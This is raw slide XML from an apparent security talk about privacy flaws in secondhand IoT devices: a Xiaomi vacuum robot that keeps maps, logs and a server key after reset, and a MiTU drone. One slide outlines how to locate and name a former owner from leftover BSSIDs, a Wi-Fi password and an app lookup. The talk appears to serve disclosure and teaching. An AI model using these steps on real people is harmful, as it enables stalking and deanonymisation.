              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data partition is formatted, but not wiped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partition with usage data is not erased (uh oh)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">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C4174258-D304-4C1B-A129-C25D2FC3FA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89012" y="3593092"/>
            <a:ext cx="2881312" cy="1406080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D50EE50-2C0A-7F40-B990-5AE341155F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77445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9DB12D-F76E-4212-96F1-C70BEA2FC7E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498763" y="151010"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mi Vacuum Robot </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE94326-1797-48E4-9BC8-07599CB8E680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526475" y="1548804"/>
            <a:ext cx="10972800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Amazing security/privacy problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Private key of server on vacuum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Home maps transmitted to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After provisioning of device with new account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Previous data visible in App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi reset only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data reuploaded to the Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logfiles locally available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After factory reset:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maps are not visible anymore</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38683501-AEB1-AA40-B5A7-330176CB6DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262872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4D5407-5CDB-4A6A-92B4-AE2C8BEC2991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="31025"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mi Vacuum Robot: locate the former owner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69E5F65E-7A58-4413-AEF0-D81C2D0D0804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263236" y="1450215"/>
            <a:ext cx="10972800" cy="5088699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log files contained 2 BSSIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Google Geolocation API returned coordinates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wi-Fi credentials reveal part of address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Password contains personal data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User-ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Search via Mi Home App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Share device with user to reveal name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>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BSSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is the MAC address of the wireless access point (WAP) generated by combining the 24 bit Organization Unique Identifier (the manufacturer's identity) and the manufacturer's assigned 24-bit identifier for the radio chipset in the WAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E31400-2738-45AE-A388-CD2FDF446EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11846867" y="4369215"/>
            <a:ext cx="461665" cy="2085123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: Google Maps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F550655-98E7-4105-945D-94F01F97F6E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75017" y="1745665"/>
            <a:ext cx="2929057" cy="2627869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EBA055-DDB5-BD49-8168-0C4D916A941C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928759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89822-79DC-4D16-97F5-F1395682A40B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="135649"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Other examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MiTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Drone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F1724D-08F5-43F8-861D-377688BDD277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318655" y="1537855"/>
            <a:ext cx="11263745" cy="4588309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Child’s toy, but powerful device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOC: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leadcore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LC1813</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash: 4GByte eMMC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RAM: 512 Mbyte DDR2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Two cameras!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access via: Serial, ADB (after root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recorded videos are on internal memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can’t be deleted if device is broken</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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9E44E63-E98B-4E1F-85DF-0D794585BD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95115" y="3495210"/>
            <a:ext cx="3343897" cy="2868483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F9E1E1-45B7-41FB-BBF8-8D16AEB1D2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81536" y="1074564"/>
            <a:ext cx="2982312" cy="2202034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A34B1AB-7607-F842-BCCC-4E158D5D3569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16625326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60EF3-255C-403F-BB2F-54471A26E3B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="37544"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Door bells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292467F4-72B0-47EA-BFCA-0BA1E7E0B2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
